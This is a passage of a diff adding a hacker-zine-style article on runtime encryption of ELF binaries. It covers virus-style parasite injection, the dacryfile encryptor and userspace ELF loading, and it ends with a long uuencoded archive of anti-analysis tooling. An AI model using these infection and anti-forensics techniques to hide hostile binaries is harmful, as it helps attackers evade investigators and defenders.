+     decrypted, and then encrypted again after use. CPU intensive, but
+     extremely difficult to analyse.
+
+   * Proprietary Binary Formats: If the object code is stored in an unknown
+     format, it is quite difficult for the reverse engineer to determine what
+     is data and what is text.
+
+
+--[ Runtime encryption techniques
+
+--[ The virus approach
+
+Adding code to an ELF executeable is far from being new. There have been
+known ELF viruses since about 1997, and Silvio was the first to publish
+about it [2], [3].
+
+One nasty property about the ELF format is its "easy loading" design
+goal. The program headers and the associated segments map directly into the
+memory, speeding up the preparation of the executeable when executing it.
+The way its implemented in the ELF format makes it difficult to change the
+file layout after linking. To add code or to modify the basic structure
+becomes nearly impossible, since a lot of hardcoded values cannot be
+adjusted without knowing the pre-linking information, such as relocation
+information, symbols, section headers and the like. But most of such
+information is either gone in the binary or incomplete.
+
+Even with such information, modifying the structure of the ELF
+executeable is difficult (without using a sophisticated library such as
+libbfd). For an in-depth discussion about reducing the pain when modifying
+shared libraries with most of the symbol information intact, klog has
+written an article about it [4].
+
+Because of this difficulties, most attempts in the past have focused on
+exploiting 'gaps' within the ELF binary, that get mapped into memory when
+loading it, but remain unused. Such areas are needed to align the memory on
+pages. As mentioned earlier, ELF has been designed for fast loading, and
+this alignment in the file guarantees a one-to-one mapping of the file into
+the memory. Also, as we will see below, this alignment allows easy
+implementation of page-wise granularity for read, write and execution
+permission.
+
+So the 'usual' ELF virus searches through the host executeable for such
+gaps, and in case a sufficient large area has been found it writes a copy
+of itself into it. Afterwards it redirects the execution flow of the
+program to its own area, often by just modifying the program entry point in
+the ELF header. There have been numerous examples for such viruses, most
+notable the 'VIT' [5] and 'Brundle-Fly' [6] virii.
+
+While this approach works moderatly well in practice, it cannot infect
+every ET_EXEC ELF executeable. The page size (PAGE_SIZE) on a UNIX system
+is often 4096, and since the padding can take up at max a whole page, the
+chances of finding a possible gap is dependant on the virus size and the
+host executeable. An average virus of the above type takes about 2000 bytes
+and hence can infect only about 50 percent of all executeables. While for
+virii this adds some non-deterministic fun and does not really matter, for
+reliable binary encryption this approach has serious drawbacks.
+
+However, there have been mad people using this approach for basic binary
+encryption purposes. The program which does this is called dacryfile. There
+is a demonstration copy of dacryfile* available from [7]. Dacryfile uses a
+data injected parasite to perform the run time decryption of the host file.
+While dacryfile is undocumented, a limited amount of information is provided
+here for the curious.
+
+Dacryfile is a collection of tools which implement the following concept.
+The host file is encrypted from the start of the .text section, to the end
+of the .text segment. The file now has its object code and its read only
+data protected by encryption, while all its data and dynamic objects are
+open to inspection. The host file is injected with a parasite that will
+perform the runtime decryption. This parasite can be of arbitrary size
+because it is appended to the end of the .data segment. 
+
+The default link map of a gcc produced Linux ELF has the .dynamic section
+as the last prior to the .bss section. The .dynamic section is an array of
+Elf32_Dyn structures, terminated by a NULL struct tag. Therefore, regardless
+of how big the .dynamic section, processing of its contents will halt when
+the terminating Elf32_Dyn struct is encountered. A parasite can be injected
+at the end of the section without damaging the host file in any way. The
+dacryfile program "inject" appends the .text section from a parasite object
+file onto the .dynamic section of a host binary.
+
+The parasite itself is fairly simple, utilising the subversive dynamic
+linking Linux library to access libc functions, and rc4 to decrypt the host.
+
+The dacryfile collection is unsupported and undocumented, it and all other
+first generation binary encryptors, are a dead end. However, a dacryfile
+protected binary will be extremely immune from the recent pitiful attempts
+at reverse engineering by the forensic experts. Provided the encryption
+passphrase remains secret, and is strong enough to withstand a brute force
+attack, a dacryfile protect binary will keep is its object code or read-only
+data secure from examination. The dynamic string table will still be
+available, but that will provide limited information about the functionality
+of the binary.
+
+Also included with the article is a stripped down but functional loader of
+the burneye runtime encryption program. It is commented and should work
+just fine.
+
+* dacryphilia is a fetish in which one gains sexual arousal through the
+  tears of one's partner.
+
+
+--[ Packing/Userspace ELF loader
+
+The most flexible approach to wrap an executeable has been invented by the
+developers of the UPX packer [12], by John Reiser to be exact :). They load
+the binary in userspace, much like the kernel does it. When done properly
+there is no visible change in behaviour to the wrapped program, while it
+has no constrains on either the wrapper or the wrapped executeable, as the
+techniques mentioned before have. So this is the way we want to encrypt
+binaries, by loading them from userspace.
+
+Normally the kernel is responsible for loading the ELF executeable into
+memory, setting page permissions and allocating storage. Then it passes
+control to the code in the executeable.
+
+On todays system this is not fully true anymore. The kernel still does a
+lot of initial work, but then interacts with a userspace runtime linker
+(rtld) to resolve libraries dependancies, symbols and linking preparations.
+Only after the rtld has done the whole backstage work, control is passed to
+the real programs entry point. The program finds itself in a healthy
+environment with all library symbols resolved, well prepared memory layout
+and a carefully watching runtime linker in the background.
+
+In normal system use this is a very hidden operation and since it works
+so smooth nobody really cares. But as we are going to write a userspace ELF
+loader, we have to mess with the details. To get a rough impression, just
+write a simple "hello world" program in C, compile it, and instead of just
+running it, do a strace on it. Ever wondered what happens as so many
+syscalls are issued by your one-line executeable?
+
+This is the runtime linker in action, trying to resolve your 'printf'
+symbol after it mapped the entire C library into memory and prepared the
+page permissions.
+
+A lot of interesting details about the history of linkers and program
+loading can be found in [8].
+
+
+--[ The future
+
+Forensic work on binary executeables will become very difficult, and most
+of the people who do forensics nowadays will drop out of the field. Most
+likely some people from the reverse engineering 'scene' will convert more
+to network security and become forensics.
+
+There are promising approaches to incorporating decompilation and
+data/code flow analysis techniques into binary encryption to implement
+further protections against tampering, analyzing and deprotecting such
+binaries.
+
+The strength of the next protections will rely on the missing debug
+interfaces on most UNIX's, that are able to deal with hostile code. The
+generation of protections that come afterwards will rely solely on their
+sophisticated obfuscation approaches to deny attempts of static and
+dead-listing type of analysis.
+
+There are approaches to replace the overtaxed ptrace interface [9] with
+more powerful debug interfaces that can deal with hostile code. Also work
+on kernel space debuggers has been done, such as the Pice debugger [10].
+
+Aside from poor debugging tools and bad debugging hooks, the only thing
+that can be used to armour the run time binary is heavy obfuscation that
+will make it harder for a reverse engineer to see what is actually going
+on. You have to remember that a reverse engineer can see each atomic
+operation that is performed, as well as what is going on in memory (i.e.
+change variables, new mmaps, read()s, etc. etc. If this is to be defeated,
+they need to be swamped with information. They need to be so bady off that
+they cry about each time they have to restart their debuggers!
+
+
+--[ References
+
+  [1] Tool Interface Standard, Executeable and Linking Format, Version 1.2
+      http://segfault.net/~scut/cpu/generic/TIS-ELF_v1.2.pdf
+
+      http://www.caldera.com/developers/gabi/latest/contents.html
+      http://www.caldera.com/developers/devspecs/gabi41.pdf
+
+      additional per-architecture information is available from
+      http://www.caldera.com/developers/devspecs/
+
+  [2] Silvio Cesare, Unix viruses
+      http://www.big.net.au/~silvio/unix-viruses.txt
+
+  [3] Silvio Cesare, Unix ELF parasites and virus
+      http://www.big.net.au/~silvio/elf-pv.txt
+
+  [4] klog, Phrack #56 article 9, Backdooring binary objects
+      http://www.phrack.org/show.php?p=56&a=9
+
+  [5] Silvio Cesare, The 'VIT' virus
+      http://www.big.net.au/~silvio/vit.html
+
+  [6] Konrad Rieck, Konrad Kretschmer
+      'Brundle-Fly', a good-natured Linux ELF virus
+      http://www.roqe.org/brundle-fly/
+
+  [7] The grugq, dacryfile binary encryptor
+      http://hcunix.7350.org/grugq/src/dacryfile.tgz
+
+  [8] John R. Levine, Linkers & Loaders
+      ISBN 1-55860-496-0
+
+  [9] Linux ptrace man page (see if you can catch the three errors)
+      http://www.die.net/doc/linux/man/man2/ptrace.2.html
+
+ [10] PrivateICE Linux system level symbolic source debugger
+      http://pice.sourceforge.net/
+
+ [11] Konstantin Boldyshev, Startup state of Linux/i386 ELF binary
+      http://linuxassembly.org/startup.html
+
+ [12] UPX, the Ultimate Packer for eXecutables
+      http://upx.sourceforge.net/
+
+ [13] GNU binutils
+      ftp://ftp.gnu.org
+ 
+ [14] Forensic analysis of a burneye protected binary
+      http://www.incidents.org/papers/ssh_exploit.pdf
+      http://staff.washington.edu/dittrich/misc/ssh-analysis.txt
+ 
+ [15] The grugq, Subversive Dynamic Linking
+      http://hcunix.7350.org/grugq/doc/subversivedl.pdf
+
+
+begin 644 binary-encryption.tar.gz
+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
